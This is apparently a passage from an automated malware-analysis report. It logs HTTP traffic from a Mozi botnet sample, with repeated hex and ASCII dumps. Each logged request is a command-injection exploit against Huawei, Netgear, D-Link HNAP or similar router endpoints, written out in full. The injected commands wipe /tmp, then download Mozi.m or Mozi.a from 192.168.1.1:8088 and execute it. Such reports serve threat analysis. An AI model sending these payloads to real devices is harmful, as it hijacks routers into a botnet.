72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 11.229.114.210:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 65.194.91.247:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 133.54.33.50:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 123.181.117.29:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 65.100.62.222:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 68.197.47.178:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 34.36.6.14:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 145.148.35.254:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 